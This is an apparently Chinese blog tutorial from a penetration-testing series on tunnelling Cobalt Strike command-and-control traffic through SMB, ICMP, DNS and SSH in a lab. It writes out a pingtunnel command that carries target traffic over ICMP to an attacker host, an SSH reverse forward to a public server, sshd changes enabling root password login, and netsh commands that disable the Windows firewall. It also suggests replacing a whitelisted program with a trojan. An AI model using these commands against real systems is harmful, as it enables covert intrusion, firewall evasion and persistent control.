内网安全：隧道技术详解_第125天内网安全-隧道技术&amp；smb&amp；icmp&amp；正反向连接&amp；防火墙出入规则上线_网络安全隧道工具_内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线-CSDN博客

本文链接：https://blog.csdn.net/2401_84240129/article/details/138245263

本文介绍了如何通过实战操作，利用SMB、ICMP、DNS和SSH协议在内网环境中建立隧道，进行网络渗透和控制。文章详细步骤包括生成SMB后门、配置监听器、利用DNS协议进行流量转发、以及SSH协议的远程登录控制。同时讨论了防火墙策略和网络安全学习资源。

摘要由CSDN通过智能技术生成

实战二：SMB协议搭建隧道正向连接 - 拿下win 2012

判断：进行网络扫描看看有没445端口开放

一. 生成SMB后门

创建监听器

生成后门

二. 横向移动

配置监听器

选择会话

三. 上线CS

拓扑图

这是通过横向移动拿下对方主机权限后搭建SMB协议隧道完成上线控制，通过SMB协议搭建的隧道完成对方流量出网，在CS处上线进行持久化控制。

隧道技术 - ICMP协议

判断：ping 命令走的就是ICMP协议

ICMP协议搭建隧道的实验在前面已经做过，可以参考我得这篇博客：

内网安全：初探隧道技术_貌美不及玲珑心，贤妻扶我青云志的博客-CSDN博客

关于ICMP协议

ICMP（Internet Control Message Protocol，互联网控制报文协议）是一种用于在IP网络中传递控制消息的协议。它是IP协议的一个补充，用于提供网络诊断、错误报告和网络管理等功能。以下是关于ICMP协议的一些重要特点：

控制消息传递：ICMP协议主要用于在网络中传递控制消息。这些消息可以用于报告错误、提供网络状态信息、请求和响应等。
错误报告：ICMP协议定义了多种错误报告消息，用于通知源主机或路由器发生的错误或问题。例如，目标不可达、超时、重定向等。
Ping和Traceroute：ICMP协议被广泛用于网络诊断工具，如Ping和Traceroute。Ping工具使用ICMP Echo Request和Echo Reply消息来测试主机之间的可达性和延迟。Traceroute工具利用ICMP Time Exceeded消息来跟踪数据包在网络中的路径。
路由选择：ICMP协议还包括用于路由选择的消息，如路由器发现和重定向消息。这些消息用于路由器之间的通信，以便更好地选择和更新网络路径。
报文格式：ICMP消息被封装在IP数据包中进行传输。ICMP报文包括一个固定的报头和一个可变长度的数据字段。报头包含消息类型、代码和校验和等字段。
安全性：ICMP协议的某些消息类型可能会被用于网络攻击，如Ping洪水攻击和ICMP重定向攻击。因此，在网络环境中应采取适当的安全措施，如防火墙配置和流量过滤，以防止滥用和减少风险。

ICMP协议在互联网中扮演着重要的角色，它提供了诊断和管理网络的能力，使得网络管理员能够监测和排除网络问题。同时，ICMP也为网络设备之间的通信提供了一种可靠的机制。

ICMP隧道搭建

一. 靶机TCP流量转发本地端口并封装进入ICMP协议

CS端配置两个监听器

监听器1：IP：127.0.0.1 PORT：6666

监听器2：IP：192.168.46.66 PORT：7777

使用监听器1生成后门，上传到靶机并执行

同时被攻击机执行这条指令

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1

靶机会把访问攻击机的TCP流量发到自己本地6666端口并封装进ICMP协议再进行发出

二. 取得TCP流量上线CS

攻击机上运行

./pingtunnel -type server

先对收到的ICMP取出TCP流量，完成靶机上线CS！！！

工具地址：GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP

隧道技术 - DNS协议

判断：nslookup www.baidu.com 能返会结果，说明DNS可以出网

DNS属于是应用层协议，但是DNS在不同情况下使用的协议不同

DNS在区域传输时使用TCP，域名解析使用UDP

防火墙上禁用的是TCP，DNS协议搭建隧道利用的是域名解析，所以使用的是UDP

DNS协议

DNS（Domain Name System，域名系统）是互联网上用于**将域名（例如www.example.com）转换为对应的IP地址的协议。**它充当了互联网的“电话簿”，提供了域名与IP地址之间的映射关系。

以下是关于DNS协议的一些重要特点：

域名解析：DNS协议的主要功能是将用户提供的域名解析为相应的IP地址。当用户在浏览器中输入一个域名时，浏览器会向本地DNS服务器发送DNS查询请求，然后逐级向上查询，直到找到与域名对应的IP地址。
分布式系统：DNS采用分布式的设计，全球范围内存在多个DNS服务器，分为根服务器、顶级域服务器、权威域服务器和本地DNS服务器。这种分布式架构确保了查询的效率和可靠性。
查询类型：DNS支持不同类型的查询，包括最常见的A记录查询（将域名解析为IPv4地址）和AAAA记录查询（将域名解析为IPv6地址）。还有其他类型的记录，如CNAME记录（别名记录）、MX记录（邮件交换记录）等。
域名层次结构：DNS使用了域名层次结构，将域名划分为多个层级，以方便管理和查询。域名从右向左逐级划分，最右边的部分为顶级域（例如.com、.net），左边的部分依次为二级域、三级域，以此类推。
缓存：为了提高查询效率，DNS服务器会对查询结果进行缓存，将解析结果保存一段时间。当再次查询相同的域名时，可以直接返回缓存的结果，而不需要重新查询。
DNSSEC：DNSSEC（DNS Security Extensions）是一种对DNS进行安全增强的扩展协议。它提供了对DNS查询和响应进行数字签名的机制，以防止DNS劫持和欺骗攻击。

DNS协议在互联网中扮演了重要的角色，它使得用户可以使用易记的域名访问网站，而不需要记住复杂的IP地址。同时，DNS也为互联网的安全性和可靠性提供了基础支持。

DNS协议搭建隧道网络拓扑图

实战三：DNS协议搭建隧道实验

原理

在进行DNS查询时，如果查询的域名不在DNS服务器本机的缓存中，就会访问互联网进行查询，然后返回结果。如果在互联网上有一台定制的服务器，那么依靠DNS协议即可进行数据包的交换。但其本质问题是，预期的返回结果应该是一个IP地址，而事实上不是一返回的可以是任意字符串，包括加密的 C&C指令 (管理僵尸网络进行APT攻击的指令)

一. 配置域名NS解析

需要准备一个域名并配置两条NS解析，NS解析将子域名指定其它DNS解析

当解析ns1.whgojp.top域名就会让DNS解析cs.whgojp.top，最终解析为一个IP

这个IP是我们CS服务器的地址

二 . 配置DNS监听器

三. 木马执行上线

使用这个监听器生成后门，上传对方服务器并执行

点击进去输入命令，建立DNS联系

上线CS

补充：DNS协议通讯

DNS协议也有在通讯方面的应用，但是个人感觉太鸡肋，因为实现DNS通讯需要权限，都有高权限了直接上线即可，还建立什么通讯。所以这种通讯在内网渗透没有什么价值，在内网穿透可能有些价值。

隧道技术 - SSH协议

CS上无法使用这个隧道技术进行上线，想要使得Linux上线需要使用别的工具。

但是SSH隧道在通讯上具有一定的意义

SSH协议

SSH（Secure Shell，安全外壳协议）是一种用于在不安全网络上安全地进行远程登录和数据传输的网络协议。它通过加密通信和身份验证机制，提供了保密性、完整性和身份认证等安全功能。以下是关于SSH协议的一些重要特点：

远程登录：SSH协议最常见的用途是远程登录到远程计算机系统上。通过SSH协议，用户可以在本地计算机上通过终端访问和操作远程计算机，就像直接在远程计算机上操作一样。
加密通信：SSH协议使用加密算法来保护通信的机密性和完整性。它通过对传输的数据进行加密，防止被第三方窃听和篡改。常见的加密算法包括AES、3DES、RC4等。
身份认证：SSH协议支持多种身份认证方式，例如基于密码的身份认证、公钥身份认证和证书身份认证等。公钥身份认证是最常用的方式，它使用公钥和私钥来实现身份验证和加密通信。
端口转发：SSH协议还支持端口转发功能，可以将本地计算机的某个端口映射到远程计算机，从而实现本地和远程计算机之间的安全通信。
文件传输：SSH协议提供了安全的文件传输功能，即SCP（Secure Copy）和SFTP（SSH File Transfer Protocol）。这些功能允许用户在本地计算机和远程计算机之间传输文件，并确保传输过程的安全性。
X11转发：SSH协议支持X11图形界面的远程显示功能，允许用户在远程计算机上运行图形应用程序，并将图形界面显示在本地计算机上。

SSH协议是一种广泛使用的安全协议，适用于远程管理、文件传输、远程终端访问等场景。它提供了强大的安全性和可靠性，使得远程计算机之间的通信变得更加安全和便捷。

SSH协议搭建隧道网络拓扑图

已经拿下了Linux主机的权限，借助Linux主机搭建SSH隧道探针Linux所在的内网

Linux开启SSH协议登录：

vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

实战四：SSH搭建隧道通讯

这个隧道搭建的意义就在于可以实现对内网的探针

Linux：入站封走反向

将本地访问1.16 8080端口的流量发给47.94.236.117 1234端口上

ssh -CfNg -R 1122:192.168.1.16:8080 root@47.94.236.117

这个需要公网服务器的密码，利用条件很低

公网服务器访问本地1234端口

Linux：出站封走正向

将本地访问1.16 8080端口的流量转发至本地1122端口

ssh -CfNg -L 1122:192.168.1.16:8080 root@192.168.1.166

在这台Linux上访问本地1122端口即可

Linux上线CS解决办法

项目地址：GitHub - gloxec/CrossC2: generate CobaltStrike’s cross-platform payload

面向Linux Mac IOS Android系统上线支持
插件使用，命令使用

使用参考：https://gloxec.github.io/CrossC2/zh_cn/

下载对应版本加载器和CNA插件
上传加载器文件和本地加载CNA插件
修改CNA插件配置路径及上传Key文件
使用命令或插件绑定HTTPS监听器生成

根据CS服务系统类型选择插件，我的是Linux，下载Linux即可

上传至你的CS目录下

还有这两个文件，从CS客户端加载，在windows上加载

目前支持反向的HTTPS和正向的TCP

创建监听器

反向上线

在CS上有这个文件

生成后门，在system处可以选择系统

服务端生成后门文件

上线

通过程序进行上线，更方便一些

防火墙

当我们拿下服务器权限后，防火墙过滤极端严格，隧道不管用，还有办法，选择干掉防火墙。当然风险还是很大的。

可以直接关闭防火墙，删除规则，或者替换

建议尝试替换，动静较小，有的程序把自己放入白名单中，替换程序

可以把木马与程序进行替换

防火墙相关命令：

查看当前防火墙状态：netsh advfirewall show allprofiles
关闭防火墙：netsh advfirewall set allprofiles state off
开启防火墙：netsh advfirewall set allprofiles state on
恢复初始防火墙设置：netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略：netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound

`黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。